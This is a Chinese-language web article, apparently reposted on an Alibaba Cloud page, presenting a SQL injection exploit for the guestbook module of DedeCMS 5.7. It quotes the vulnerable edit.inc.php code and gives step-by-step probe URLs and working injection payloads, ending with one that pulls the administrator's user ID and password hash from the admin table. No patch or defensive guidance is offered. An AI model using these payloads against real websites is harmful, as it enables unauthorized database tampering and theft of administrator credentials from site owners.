dedecms5.7最新sql利用 guestbook.php注射漏洞

最後更新：2018-04-10 來源：互聯網

上載者：User

創建阿里雲帳戶，並獲得超過 40 款產品的免費試用版；而企業帳戶則可以享有總值 $1200 的免費試用版。立即註冊！

本篇文章介紹的內容是關於dedecms5.7最新sql利用 guestbook.php注射漏洞，現在分享給大家，有需要的朋友可以參考一下

影響版本為5.7

漏洞檔案edit.inc.php具體代碼：

< ?php  if(!defined('DEDEINC')) exit('Request Error!');     if(!empty($_COOKIE['GUEST_BOOK_POS'])) $GUEST_BOOK_POS = $_COOKIE['GUEST_BOOK_POS'];  else $GUEST_BOOK_POS = "guestbook.php";     $id = intval($id);  if(empty($job)) $job='view';     if($job=='del' && $g_isadmin)  {  $dsql->ExecuteNoneQuery(" DELETE FROM `#@__guestbook` WHERE id='$id' ");  ShowMsg("成功刪除一條留言！", $GUEST_BOOK_POS);  exit();  }  else if($job=='check' && $g_isadmin)  {  $dsql->ExecuteNoneQuery(" UPDATE `#@__guestbook` SET ischeck=1 WHERE id='$id' ");  ShowMsg("成功審核一條留言！", $GUEST_BOOK_POS);  exit();  }  else if($job=='editok')  {  $remsg = trim($remsg);  if($remsg!='')  {  //管理員回複不過濾HTML By:Errorera blog:errs.cc  if($g_isadmin)  {  $msg = "<p class='rebox'>".$msg."</p>\n".$remsg;  //$remsg <br /><font color=red>管理員回複：</font> }  else {  $row = $dsql->GetOne("SELECT msg From `#@__guestbook` WHERE id='$id' ");  $oldmsg = "<p class='rebox'>".addslashes($row['msg'])."</p>\n";  $remsg = trimMsg(cn_substrR($remsg, 1024), 1);  $msg = $oldmsg.$remsg;  }  }  //這裡沒有對$msg過濾，導致可以任意注入了By:Errorera home:www.errs.cc  $dsql->ExecuteNoneQuery("UPDATE `#@__guestbook` SET `msg`='$msg', `posttime`='".time()."' WHERE id='$id' ");  ShowMsg("成功更改或回複一條留言！", $GUEST_BOOK_POS);  exit();  }  //home:www.errs.cc  if($g_isadmin)  {  $row = $dsql->GetOne("SELECT * FROM `#@__guestbook` WHERE id='$id'");  require_once(DEDETEMPLATE.'/plus/guestbook-admin.htm');  }  else {  $row = $dsql->GetOne("SELECT id,title FROM `#@__guestbook` WHERE id='$id'");  require_once(DEDETEMPLATE.'/plus/guestbook-user.htm');  }

漏洞成功需要條件：
1. php magic_quotes_gpc=off
2.漏洞檔案存在 plus/guestbook.php dede_guestbook 表當然也要存在。

怎麼判斷是否存在漏洞：
先開啟www.xxx.com/plus/guestbook.php 可以看到別人的留言，
然後滑鼠放在 [回複/編輯] 上可以看到別人留言的ID。那麼記下ID
訪問：

www.xxx.com/plus/guestbook.php?action=admin&job=editok&msg=errs.cc'&id=存在的留言ID

提交後如果是dede5.7版本的話會出現 “成功更改或回複一條留言” 那就證明修改成功了
跳回到www.xxx.com/plus/guestbook.php 看下你改的那條留言ID是否變成了 errs.cc’

如果變成了那麼證明漏洞無法利用應為他開啟了 php magic_quotes_gpc=off

如果沒有修改成功，那留言ID的內容還是以前的那就證明漏洞可以利用。
那麼再次訪問

www.xxx.com/plus/guestbook.php?action=admin&job=editok&id=存在的留言ID&msg=',msg=user(),email='

然後返回，那條留言ID的內容就直接修改成了mysql 的user().

大概利用就是這樣，大家有興趣的多研究下！！

最後補充下，估計有人會說怎麼暴管理後台帳戶密碼，你自己研究下會知道的。反正絕對可以暴出來(不可以暴出來我就不會發)！！

view sourceprint?1 /plus/guestbook.php?action=admin&job=editok&id=146&msg=',msg=@`'`,msg=(selecT CONCAT(userid,0x7c,pwd) fRom `%23@__admin` LIMIT 0,1),email='

本文章原先以中文撰寫並發佈於 aliyun.com，亦設英文版本，僅作資訊用途。本網站不對文章的準確性，完整性或可靠性或其任何翻譯作出任何明示或暗示的陳述或保證。如對該文章有任何疑慮或投訴，請傳送電郵至 info-contact@alibabacloud.com 並提供相關疑慮或投訴的詳細說明。職員會於 5 個工作天內與您聯絡，一經驗證之後，即會刪除該侵權內容。

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

Sales Support

1 on 1 presale consultation

Chat Contact Sales
After-Sales Support

24/7 Technical Support 6 Free Tickets per Quarter Faster Response

Open a Ticket
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

Learn More